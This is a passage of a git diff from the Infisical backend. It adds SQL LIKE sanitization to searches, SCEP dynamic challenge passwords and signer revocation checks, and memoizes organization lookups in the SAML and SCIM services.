"@app/lib/fn"; import { ormify } from "@app/lib/knex"; import { PkiDiscoveryScanStatus } from "./pki-discovery-types"; @@ -51,8 +52,9 @@ export const pkiDiscoveryConfigDALFactory = (db: TDbClient) => { .limit(limit); if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); query = query.andWhere((qb) => { - void qb.whereILike("name", `%${search}%`).orWhereILike("description", `%${search}%`); + void qb.whereILike("name", `%${sanitizedSearch}%`).orWhereILike("description", `%${sanitizedSearch}%`); }); } @@ -68,8 +70,9 @@ export const pkiDiscoveryConfigDALFactory = (db: TDbClient) => { let query = (tx || db.replicaNode())(TableName.PkiDiscoveryConfig).where({ projectId }).count("id").first(); if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); query = query.andWhere((qb) => { - void qb.whereILike("name", `%${search}%`).orWhereILike("description", `%${search}%`); + void 
qb.whereILike("name", `%${sanitizedSearch}%`).orWhereILike("description", `%${sanitizedSearch}%`); }); } diff --git a/backend/src/ee/services/pki-discovery/pki-discovery-fns.ts b/backend/src/ee/services/pki-discovery/pki-discovery-fns.ts index 8cdcd0429a7..5caa62b9896 100644 --- a/backend/src/ee/services/pki-discovery/pki-discovery-fns.ts +++ b/backend/src/ee/services/pki-discovery/pki-discovery-fns.ts @@ -103,18 +103,23 @@ export const validateTargetConfig = ( const singleIps = ipRanges.filter((r) => !r.includes("/")); if (shouldBlockPrivateIps(!!hasGateway)) { + const appCfg = getConfig(); + const selfHostedHint = appCfg.isCloud + ? "" + : " If you are self-hosting, you can alternatively set the 'ALLOW_INTERNAL_IP_CONNECTIONS' environment variable to 'true' on your instance to scan private networks without a gateway."; + const privateIp = singleIps.find((ip) => isPrivateIp(ip)); if (privateIp) { return { valid: false, - error: "Private/internal IP addresses require a gateway. Use a gateway to scan private networks." + error: `Private/internal IP addresses require a gateway. Use a gateway to scan private networks.${selfHostedHint}` }; } const privateCidr = cidrRanges.find((cidr) => isPrivateIp(cidr.split("/")[0])); if (privateCidr) { return { valid: false, - error: "Private/internal CIDR ranges require a gateway. Use a gateway to scan private networks." + error: `Private/internal CIDR ranges require a gateway. 
Use a gateway to scan private networks.${selfHostedHint}` }; } } diff --git a/backend/src/ee/services/pki-discovery/pki-discovery-service.ts b/backend/src/ee/services/pki-discovery/pki-discovery-service.ts index 748b0ba632f..561f5777b73 100644 --- a/backend/src/ee/services/pki-discovery/pki-discovery-service.ts +++ b/backend/src/ee/services/pki-discovery/pki-discovery-service.ts @@ -8,7 +8,6 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, DatabaseError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; -import { TProjectDALFactory } from "@app/services/project/project-dal"; import { TGatewayV2DALFactory } from "../gateway-v2/gateway-v2-dal"; import { TPkiDiscoveryConfigDALFactory } from "./pki-discovery-config-dal"; @@ -46,7 +45,6 @@ type TPkiDiscoveryServiceFactoryDep = { TPkiDiscoveryScanHistoryDALFactory, "findLatestByDiscoveryId" | "findByDiscoveryId" | "countByDiscoveryId" >; - projectDAL: Pick; permissionService: Pick; gatewayV2DAL: Pick; queuePkiDiscoveryScan: (discoveryId: string) => Promise; @@ -71,7 +69,6 @@ const validateTargetConfigForType = (discoveryType: PkiDiscoveryType, config: TP export const pkiDiscoveryServiceFactory = ({ pkiDiscoveryConfigDAL, pkiDiscoveryScanHistoryDAL, - projectDAL, permissionService, gatewayV2DAL, queuePkiDiscoveryScan @@ -104,11 +101,6 @@ export const pkiDiscoveryServiceFactory = ({ ProjectPermissionSub.PkiDiscovery ); - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ message: `Project with ID '${projectId}' not found` }); - } - const existingCount = await pkiDiscoveryConfigDAL.countByProjectId(projectId); if (existingCount >= MAX_DISCOVERIES_PER_PROJECT) { throw new BadRequestError({ diff --git a/backend/src/ee/services/pki-scep/challenge/index.ts b/backend/src/ee/services/pki-scep/challenge/index.ts new file mode 100644 index 00000000000..a327cc0ddb6 --- /dev/null +++ 
b/backend/src/ee/services/pki-scep/challenge/index.ts @@ -0,0 +1,29 @@ +import { BadRequestError } from "@app/lib/errors"; +import { TScepEnrollmentConfigDALFactory } from "@app/services/enrollment-config/scep-enrollment-config-dal"; + +import { TScepDynamicChallengeDALFactory } from "../pki-scep-dynamic-challenge-dal"; +import { dynamicChallengeValidator } from "./scep-challenge-dynamic"; +import { staticChallengeValidator } from "./scep-challenge-static"; +import { IScepChallengeValidator, ScepChallengeType } from "./scep-challenge-types"; + +export type { IScepChallengeValidator } from "./scep-challenge-types"; +export { ScepChallengeType } from "./scep-challenge-types"; + +type TScepChallengeValidatorFactoryDep = { + scepEnrollmentConfigDAL: Pick; + scepDynamicChallengeDAL: Pick; +}; + +export const getScepChallengeValidator = ( + challengeType: ScepChallengeType, + deps: TScepChallengeValidatorFactoryDep +): IScepChallengeValidator => { + switch (challengeType) { + case ScepChallengeType.DYNAMIC: + return dynamicChallengeValidator({ scepDynamicChallengeDAL: deps.scepDynamicChallengeDAL }); + case ScepChallengeType.STATIC: + return staticChallengeValidator({ scepEnrollmentConfigDAL: deps.scepEnrollmentConfigDAL }); + default: + throw new BadRequestError({ message: `Unsupported SCEP challenge type: ${String(challengeType)}` }); + } +}; diff --git a/backend/src/ee/services/pki-scep/challenge/scep-challenge-dynamic.ts b/backend/src/ee/services/pki-scep/challenge/scep-challenge-dynamic.ts new file mode 100644 index 00000000000..c7c636adf78 --- /dev/null +++ b/backend/src/ee/services/pki-scep/challenge/scep-challenge-dynamic.ts @@ -0,0 +1,21 @@ +import { crypto } from "@app/lib/crypto/cryptography"; + +import { TScepDynamicChallengeDALFactory } from "../pki-scep-dynamic-challenge-dal"; +import { IScepChallengeValidator } from "./scep-challenge-types"; + +type TDynamicChallengeValidatorDep = { + scepDynamicChallengeDAL: Pick; +}; + +export const 
dynamicChallengeValidator = ({ + scepDynamicChallengeDAL +}: TDynamicChallengeValidatorDep): IScepChallengeValidator => ({ + validate: async (challengePassword: string, scepConfigId: string): Promise => { + if (!challengePassword) return false; + + const hashedChallenge = crypto.nativeCrypto.createHash("sha256").update(challengePassword).digest("hex"); + const claimed = await scepDynamicChallengeDAL.consumeByHash(hashedChallenge, scepConfigId); + + return !!claimed; + } +}); diff --git a/backend/src/ee/services/pki-scep/challenge/scep-challenge-static.ts b/backend/src/ee/services/pki-scep/challenge/scep-challenge-static.ts new file mode 100644 index 00000000000..538842d40da --- /dev/null +++ b/backend/src/ee/services/pki-scep/challenge/scep-challenge-static.ts @@ -0,0 +1,21 @@ +import { crypto } from "@app/lib/crypto/cryptography"; +import { TScepEnrollmentConfigDALFactory } from "@app/services/enrollment-config/scep-enrollment-config-dal"; + +import { IScepChallengeValidator } from "./scep-challenge-types"; + +type TStaticChallengeValidatorDep = { + scepEnrollmentConfigDAL: Pick; +}; + +export const staticChallengeValidator = ({ + scepEnrollmentConfigDAL +}: TStaticChallengeValidatorDep): IScepChallengeValidator => ({ + validate: async (challengePassword: string, scepConfigId: string): Promise => { + if (!challengePassword) return false; + + const scepConfig = await scepEnrollmentConfigDAL.findById(scepConfigId); + if (!scepConfig?.hashedChallengePassword) return false; + + return crypto.hashing().compareHash(challengePassword, scepConfig.hashedChallengePassword); + } +}); diff --git a/backend/src/ee/services/pki-scep/challenge/scep-challenge-types.ts b/backend/src/ee/services/pki-scep/challenge/scep-challenge-types.ts new file mode 100644 index 00000000000..18fe9f5e448 --- /dev/null +++ b/backend/src/ee/services/pki-scep/challenge/scep-challenge-types.ts @@ -0,0 +1,8 @@ +export enum ScepChallengeType { + STATIC = "static", + DYNAMIC = "dynamic" +} + +export 
interface IScepChallengeValidator { + validate(challengePassword: string, scepConfigId: string): Promise; +} diff --git a/backend/src/ee/services/pki-scep/pki-scep-dynamic-challenge-dal.ts b/backend/src/ee/services/pki-scep/pki-scep-dynamic-challenge-dal.ts new file mode 100644 index 00000000000..5207645dd0c --- /dev/null +++ b/backend/src/ee/services/pki-scep/pki-scep-dynamic-challenge-dal.ts @@ -0,0 +1,71 @@ +import { Knex } from "knex"; + +import { TDbClient } from "@app/db"; +import { TableName } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify } from "@app/lib/knex"; + +export type TScepDynamicChallengeDALFactory = ReturnType; + +export const scepDynamicChallengeDALFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.PkiScepDynamicChallenge); + + const consumeByHash = async (hashedChallenge: string, scepConfigId: string, tx?: Knex) => { + try { + const [result] = await (tx || db)(TableName.PkiScepDynamicChallenge) + .where({ hashedChallenge, scepConfigId }) + .where("expiresAt", ">", new Date()) + .delete() + .returning("*"); + + return result; + } catch (error) { + throw new DatabaseError({ error, name: "Consume SCEP dynamic challenge by hash" }); + } + }; + + const countPending = async (scepConfigId: string, tx?: Knex) => { + try { + const result = await (tx || db)(TableName.PkiScepDynamicChallenge) + .where({ scepConfigId }) + .where("expiresAt", ">", new Date()) + .count("id as count") + .first(); + + return Number((result as { count?: string | number })?.count ?? 
0); + } catch (error) { + throw new DatabaseError({ error, name: "Count pending SCEP dynamic challenges" }); + } + }; + + const pruneExpired = async (scepConfigId: string, tx?: Knex) => { + try { + const deletedCount = await (tx || db)(TableName.PkiScepDynamicChallenge) + .where({ scepConfigId }) + .where("expiresAt", "<", new Date()) + .delete(); + + return deletedCount; + } catch (error) { + throw new DatabaseError({ error, name: "Prune expired SCEP dynamic challenges" }); + } + }; + + const deleteByConfigId = async (scepConfigId: string, tx?: Knex) => { + try { + const deletedCount = await (tx || db)(TableName.PkiScepDynamicChallenge).where({ scepConfigId }).delete(); + + return deletedCount; + } catch (error) { + throw new DatabaseError({ error, name: "Delete SCEP dynamic challenges by config" }); + } + }; + + return { + ...orm, + consumeByHash, + countPending, + pruneExpired, + deleteByConfigId + }; +}; diff --git a/backend/src/ee/services/pki-scep/pki-scep-fns.ts b/backend/src/ee/services/pki-scep/pki-scep-fns.ts index f573a3373ba..0a528147d30 100644 --- a/backend/src/ee/services/pki-scep/pki-scep-fns.ts +++ b/backend/src/ee/services/pki-scep/pki-scep-fns.ts @@ -2,7 +2,9 @@ import * as x509 from "@peculiar/x509"; import { extractX509CertFromChain } from "@app/lib/certificates/extract-certificate"; import { crypto } from "@app/lib/crypto/cryptography"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; import { isCertChainValid } from "@app/services/certificate/certificate-fns"; +import { CertStatus } from "@app/services/certificate/certificate-types"; import { TCertificateAuthorityCertDALFactory } from "@app/services/certificate-authority/certificate-authority-cert-dal"; import { TCertificateAuthorityDALFactory } from "@app/services/certificate-authority/certificate-authority-dal"; import { getCaCertChains } from "@app/services/certificate-authority/certificate-authority-fns"; @@ -59,6 +61,7 @@ export const 
generateRaCertificate = async ( export const isSignerCertIssuedByCa = async ({ signerCertDer, caId, + certificateDAL, certificateAuthorityCertDAL, certificateAuthorityDAL, projectDAL, @@ -66,6 +69,7 @@ export const isSignerCertIssuedByCa = async ({ }: { signerCertDer: Buffer; caId: string; + certificateDAL: Pick; certificateAuthorityCertDAL: Pick; certificateAuthorityDAL: Pick; projectDAL: Pick; @@ -96,7 +100,29 @@ export const isSignerCertIssuedByCa = async ({ }) ); - return verifiedChains.some(Boolean); + const isChainValid = verifiedChains.some(Boolean); + if (!isChainValid) { + return false; + } + + // Check if the certificate has been revoked in the database + // Use transaction to read from primary DB (not replica) since this is a security-critical check + const isRevoked = await certificateDAL.transaction(async (tx) => { + const storedCert = await certificateDAL.findOne( + { + serialNumber: signerCert.serialNumber, + caId + }, + tx + ); + return storedCert?.status === CertStatus.REVOKED; + }); + + if (isRevoked) { + return false; + } + + return true; } catch { return false; } diff --git a/backend/src/ee/services/pki-scep/pki-scep-service.ts b/backend/src/ee/services/pki-scep/pki-scep-service.ts index 4c19006425e..3b5eb89084c 100644 --- a/backend/src/ee/services/pki-scep/pki-scep-service.ts +++ b/backend/src/ee/services/pki-scep/pki-scep-service.ts @@ -1,10 +1,19 @@ +import { ForbiddenError, subject } from "@casl/ability"; import * as x509 from "@peculiar/x509"; +import { randomBytes } from "crypto"; +import { ActionProjectType } from "@app/db/schemas"; +import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; +import { + ProjectPermissionCertificateProfileActions, + ProjectPermissionSub +} from "@app/ee/services/permission/project-permission"; import { extractX509CertFromChain } from "@app/lib/certificates/extract-certificate"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, 
NotFoundError } from "@app/lib/errors"; import { ActorType } from "@app/services/auth/auth-type"; import { TCertificateBodyDALFactory } from "@app/services/certificate/certificate-body-dal"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; import { TCertificateAuthorityCertDALFactory } from "@app/services/certificate-authority/certificate-authority-cert-dal"; import { TCertificateAuthorityDALFactory } from "@app/services/certificate-authority/certificate-authority-dal"; import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; @@ -31,6 +40,8 @@ import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns import { EventType, TAuditLogServiceFactory } from "../audit-log/audit-log-types"; import { convertRawCertsToPkcs7 } from "../certificate-est/certificate-est-fns"; import { TLicenseServiceFactory } from "../license/license-service"; +import { getScepChallengeValidator, ScepChallengeType } from "./challenge"; +import { TScepDynamicChallengeDALFactory } from "./pki-scep-dynamic-challenge-dal"; import { getScepCapabilities, isSignerCertIssuedByCa } from "./pki-scep-fns"; import { buildCertRepFailure, buildCertRepPending, buildCertRepSuccess } from "./pki-scep-message-builder"; import { parseScepMessage } from "./pki-scep-message-parser"; @@ -38,6 +49,7 @@ import { TScepTransactionDALFactory } from "./pki-scep-transaction-dal"; import { ScepFailInfo, ScepMessageType, + TGenerateDynamicChallengeDTO, TGetCaCapsDTO, TGetCaCertDTO, THandlePkiOperationDTO, @@ -48,7 +60,9 @@ type TPkiScepServiceFactoryDep = { certificateV3Service: Pick; certificateProfileDAL: Pick; scepEnrollmentConfigDAL: Pick; + scepDynamicChallengeDAL: TScepDynamicChallengeDALFactory; scepTransactionDAL: TScepTransactionDALFactory; + certificateDAL: Pick; certificateAuthorityDAL: Pick; certificateAuthorityCertDAL: Pick; certificateRequestDAL: Pick; @@ -61,6 +75,7 @@ type TPkiScepServiceFactoryDep = { 
certificateRequestService: Pick; certificateIssuanceQueue: Pick; auditLogService: Pick; + permissionService: Pick; }; export type TPkiScepServiceFactory = ReturnType; @@ -71,7 +86,9 @@ export const pkiScepServiceFactory = ({ certificateV3Service, certificateProfileDAL, scepEnrollmentConfigDAL, + scepDynamicChallengeDAL, scepTransactionDAL, + certificateDAL, certificateAuthorityDAL, certificateAuthorityCertDAL, certificateRequestDAL, @@ -83,7 +100,8 @@ export const pkiScepServiceFactory = ({ certificatePolicyService, certificateRequestService, certificateIssuanceQueue, - auditLogService + auditLogService, + permissionService }: TPkiScepServiceFactoryDep) => { const loadScepContext = async (profileId: string) => { const profile = await certificateProfileDAL.findByIdWithConfigs(profileId); @@ -303,9 +321,11 @@ export const pkiScepServiceFactory = ({ } } - const isValid = challengePassword - ? await crypto.hashing().compareHash(challengePassword, scepConfig.hashedChallengePassword) - : false; + const challengeValidator = getScepChallengeValidator(scepConfig.challengeType as ScepChallengeType, { + scepEnrollmentConfigDAL, + scepDynamicChallengeDAL + }); + const isValid = await challengeValidator.validate(challengePassword, scepConfig.id); if (!isValid) { // Many SCEP clients (including sscep) send PKCSReq for both initial enrollment @@ -317,6 +337,7 @@ export const pkiScepServiceFactory = ({ const isRenewalViaPKCSReq = await isSignerCertIssuedByCa({ signerCertDer: parsed.signerCertDer, caId: profile.caId!, + certificateDAL, certificateAuthorityCertDAL, certificateAuthorityDAL, projectDAL, @@ -350,7 +371,7 @@ export const pkiScepServiceFactory = ({ profileSlug: profile.slug, transactionId: parsed.transactionId, csrSubject: csrObj.subject, - challengeType: "static" as const, + challengeType: scepConfig.challengeType as ScepChallengeType, status: "failure" as const, failReason: "Invalid challenge password", clientIp @@ -385,7 +406,7 @@ export const pkiScepServiceFactory = 
({ profileSlug: profile.slug, transactionId: parsed.transactionId, csrSubject: csrObj.subject, - challengeType: "static" as const, + challengeType: scepConfig.challengeType as ScepChallengeType, clientIp }; @@ -470,6 +491,7 @@ export const pkiScepServiceFactory = ({ const isValidSigner = await isSignerCertIssuedByCa({ signerCertDer: parsed.signerCertDer, caId: profile.caId!, + certificateDAL, certificateAuthorityCertDAL, certificateAuthorityDAL, projectDAL, @@ -777,6 +799,7 @@ export const pkiScepServiceFactory = ({ switch (certRequest.status) { case CertificateRequestStatus.PENDING_APPROVAL: case CertificateRequestStatus.PENDING: + case CertificateRequestStatus.PENDING_VALIDATION: return buildCertRepPending({ raCertDer, raPrivateKeyDer, @@ -838,9 +861,98 @@ export const pkiScepServiceFactory = ({ } }; + const generateDynamicChallenge = async ({ + profileId, + actor, + actorId, + actorAuthMethod, + actorOrgId + }: TGenerateDynamicChallengeDTO) => { + const profile = await certificateProfileDAL.findByIdWithConfigs(profileId); + if (!profile || profile.enrollmentType !== EnrollmentType.SCEP) { + throw new NotFoundError({ message: "SCEP profile not found" }); + } + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId: profile.projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateProfileActions.Edit, + subject(ProjectPermissionSub.CertificateProfiles, { slug: profile.slug }) + ); + + if (!profile.scepConfigId) { + throw new BadRequestError({ message: "SCEP enrollment not configured for this profile" }); + } + + const scepConfig = await scepEnrollmentConfigDAL.findById(profile.scepConfigId); + if (!scepConfig) { + throw new NotFoundError({ message: "SCEP configuration not found" }); + } + + if (scepConfig.challengeType !== ScepChallengeType.DYNAMIC) { + throw new BadRequestError({ 
message: "Dynamic challenges are not enabled for this SCEP profile" }); + } + + const project = await projectDAL.findOne({ id: profile.projectId }); + if (!project) { + throw new NotFoundError({ message: "Project not found" }); + } + + const plan = await licenseService.getPlan(project.orgId); + if (!plan.pkiScep) { + throw new BadRequestError({ + message: "Failed to generate SCEP challenge due to plan restriction. Upgrade to the Enterprise plan." + }); + } + + const challengePlaintext = randomBytes(32).toString("hex"); + + const hashedChallenge = crypto.nativeCrypto.createHash("sha256").update(challengePlaintext).digest("hex"); + + const expiryMinutes = scepConfig.dynamicChallengeExpiryMinutes ?? 60; + const maxPending = scepConfig.dynamicChallengeMaxPending ?? 100; + + const expiresAt = new Date(); + expiresAt.setMinutes(expiresAt.getMinutes() + expiryMinutes); + + await scepDynamicChallengeDAL.transaction(async (tx) => { + const pendingCount = await scepDynamicChallengeDAL.countPending(scepConfig.id, tx); + if (pendingCount >= maxPending) { + throw new BadRequestError({ + message: `Maximum number of pending challenges (${maxPending}) reached. 
Wait for existing challenges to expire or be used.` + }); + } + + await scepDynamicChallengeDAL.create( + { + scepConfigId: scepConfig.id, + hashedChallenge, + expiresAt + }, + tx + ); + }); + + void scepDynamicChallengeDAL.pruneExpired(scepConfig.id); + + return { + challenge: challengePlaintext, + projectId: profile.projectId, + profileSlug: profile.slug, + expiresAt: expiresAt.toISOString() + }; + }; + return { getCaCaps, getCaCert, - handlePkiOperation + handlePkiOperation, + generateDynamicChallenge }; }; diff --git a/backend/src/ee/services/pki-scep/pki-scep-types.ts b/backend/src/ee/services/pki-scep/pki-scep-types.ts index f752fb81c6a..321940dab68 100644 --- a/backend/src/ee/services/pki-scep/pki-scep-types.ts +++ b/backend/src/ee/services/pki-scep/pki-scep-types.ts @@ -1,3 +1,5 @@ +import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type"; + export enum ScepMessageType { CertRep = "3", RenewalReq = "17", @@ -63,3 +65,11 @@ export type THandlePkiOperationDTO = { message: Buffer; clientIp: string; }; + +export type TGenerateDynamicChallengeDTO = { + profileId: string; + actor: ActorType; + actorId: string; + actorAuthMethod: ActorAuthMethod; + actorOrgId: string; +}; diff --git a/backend/src/ee/services/relay/relay-service.ts b/backend/src/ee/services/relay/relay-service.ts index f1b98ba530f..4f0b9c34392 100644 --- a/backend/src/ee/services/relay/relay-service.ts +++ b/backend/src/ee/services/relay/relay-service.ts @@ -1154,16 +1154,18 @@ export const relayServiceFactory = ({ actorAuthMethod: ActorAuthMethod; actorOrgId: string; }) => { - const { permission } = await permissionService.getOrgPermission({ - scope: OrganizationActionScope.Any, - actor, - actorId, - orgId: actorOrgId, - actorAuthMethod: actorAuthMethod!, - actorOrgId - }); + if (actor !== ActorType.GATEWAY) { + const { permission } = await permissionService.getOrgPermission({ + scope: OrganizationActionScope.Any, + actor, + actorId, + orgId: actorOrgId, + actorAuthMethod: 
actorAuthMethod!, + actorOrgId + }); - ForbiddenError.from(permission).throwUnlessCan(OrgPermissionRelayActions.ListRelays, OrgPermissionSubjects.Relay); + ForbiddenError.from(permission).throwUnlessCan(OrgPermissionRelayActions.ListRelays, OrgPermissionSubjects.Relay); + } const instanceRelays = await relayDAL.find({ orgId: null diff --git a/backend/src/ee/services/saml-config/saml-config-service.ts b/backend/src/ee/services/saml-config/saml-config-service.ts index f6b24789c0e..3e24f0fe397 100644 --- a/backend/src/ee/services/saml-config/saml-config-service.ts +++ b/backend/src/ee/services/saml-config/saml-config-service.ts @@ -16,6 +16,8 @@ import { } from "@app/db/schemas"; import { throwOnPlanSeatLimitReached } from "@app/ee/services/license/license-fns"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { sanitizeEmail, validateEmail } from "@app/lib/validator/validate-email"; import { TAuthLoginFactory } from "@app/services/auth/auth-login-service"; import { AuthMethod } from "@app/services/auth/auth-type"; @@ -288,7 +290,7 @@ export const samlConfigServiceFactory = ({ "Failed to create SAML SSO configuration due to plan restriction. Upgrade plan to create SSO configuration." }); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not find organization with ID "${orgId}"` }); @@ -360,7 +362,7 @@ export const samlConfigServiceFactory = ({ "Failed to update SAML SSO configuration due to plan restriction. Upgrade plan to update SSO configuration." 
}); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not find organization with ID "${orgId}"` }); @@ -532,12 +534,11 @@ export const samlConfigServiceFactory = ({ aliasType: UserAliasType.SAML }); - // Verify that the email domain (if verified on the platform) belongs to this org await verifyEmailDomainOwnership({ email, orgId, emailDomainDAL }); const sanitizedEmail = sanitizeEmail(email); validateEmail(sanitizedEmail); - const organization = await orgDAL.findOrgById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!organization) throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` }); const samlConfig = await samlConfigDAL.findOne({ orgId }); @@ -727,7 +728,7 @@ export const samlConfigServiceFactory = ({ await smtpService.sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${token}`, recipients: [user.email], substitutions: { code: token diff --git a/backend/src/ee/services/scim/scim-service.ts b/backend/src/ee/services/scim/scim-service.ts index 86fd94bdd93..db6c58c8f45 100644 --- a/backend/src/ee/services/scim/scim-service.ts +++ b/backend/src/ee/services/scim/scim-service.ts @@ -22,6 +22,8 @@ import { BadRequestError, NotFoundError, ScimRequestError, UnauthorizedError } f import { logger } from "@app/lib/logger"; import { ms } from "@app/lib/ms"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { sanitizeEmail, validateEmail } from "@app/lib/validator/validate-email"; import { TAdditionalPrivilegeDALFactory } from 
"@app/services/additional-privilege/additional-privilege-dal"; import { AuthTokenType } from "@app/services/auth/auth-type"; @@ -288,7 +290,7 @@ export const scimServiceFactory = ({ filter, orgId }) => { - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org.scimEnabled) throw new ScimRequestError({ @@ -395,7 +397,7 @@ export const scimServiceFactory = ({ const sanitizedEmail = sanitizeEmail(email); validateEmail(sanitizedEmail); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) throw new ScimRequestError({ detail: "Organization not found", @@ -424,8 +426,6 @@ export const scimServiceFactory = ({ aliasType }); - // Verify that the email domain (if verified on the platform) belongs to this org - await verifyEmailDomainOwnership({ email, orgId, emailDomainDAL }); const { user: createdUser, orgMembership: createdOrgMembership } = await userDAL.transaction(async (tx) => { @@ -575,7 +575,7 @@ export const scimServiceFactory = ({ // partial const updateScimUser: TScimServiceFactory["updateScimUser"] = async ({ orgMembershipId, orgId, operations }) => { - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org.orgAuthMethod) { throw new ScimRequestError({ detail: "Neither SAML or OIDC SSO is configured", @@ -697,7 +697,7 @@ export const scimServiceFactory = ({ email: unsanitizedEmail, externalId }) => { - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org.orgAuthMethod) { throw new ScimRequestError({ detail: "Neither SAML or OIDC SSO is configured", @@ -869,7 +869,7 @@ export const scimServiceFactory = ({ message: "Failed to list SCIM groups due to 
plan restriction. Upgrade plan to list SCIM groups." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ detail: "Organization Not Found", @@ -885,8 +885,8 @@ export const scimServiceFactory = ({ const groups = await groupDAL.findGroups( { - orgId, - ...(filter && parseScimFilter(filter)) + ...(filter && parseScimFilter(filter)), + orgId }, { offset: startIndex - 1, @@ -987,7 +987,7 @@ export const scimServiceFactory = ({ message: "Failed to create a SCIM group due to plan restriction. Upgrade plan to create a SCIM group." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ @@ -1285,7 +1285,7 @@ export const scimServiceFactory = ({ message: "Failed to update SCIM group due to plan restriction. Upgrade plan to update SCIM group." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ detail: "Organization Not Found", @@ -1326,7 +1326,7 @@ export const scimServiceFactory = ({ message: "Failed to update SCIM group due to plan restriction. Upgrade plan to update SCIM group." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ @@ -1394,7 +1394,7 @@ export const scimServiceFactory = ({ message: "Failed to delete SCIM group due to plan restriction. Upgrade plan to delete SCIM group." 
}); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ detail: "Organization Not Found", diff --git a/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts b/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts index 4558458a2c7..44d0fc92517 100644 --- a/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts +++ b/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts @@ -12,6 +12,7 @@ import { TUsers } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols, sqlNestRelationships, stripUndefinedInWhere, TFindFilter } from "@app/lib/knex"; import { RequestState } from "./secret-approval-request-types"; @@ -537,13 +538,19 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => { .whereRaw(`CONCAT_WS(' ', ??, ??) ilike ?`, [ db.ref("firstName").withSchema("committerUser"), db.ref("lastName").withSchema("committerUser"), - `%${search}%` + `%${sanitizeSqlLikeString(search)}%` ]) - .orWhereRaw(`?? ilike ?`, [db.ref("username").withSchema("committerUser"), `%${search}%`]) - .orWhereRaw(`?? ilike ?`, [db.ref("email").withSchema("committerUser"), `%${search}%`]) - .orWhereILike(`${TableName.Environment}.name`, `%${search}%`) - .orWhereILike(`${TableName.Environment}.slug`, `%${search}%`) - .orWhereILike(`${TableName.SecretApprovalPolicy}.secretPath`, `%${search}%`); + .orWhereRaw(`?? ilike ?`, [ + db.ref("username").withSchema("committerUser"), + `%${sanitizeSqlLikeString(search)}%` + ]) + .orWhereRaw(`?? 
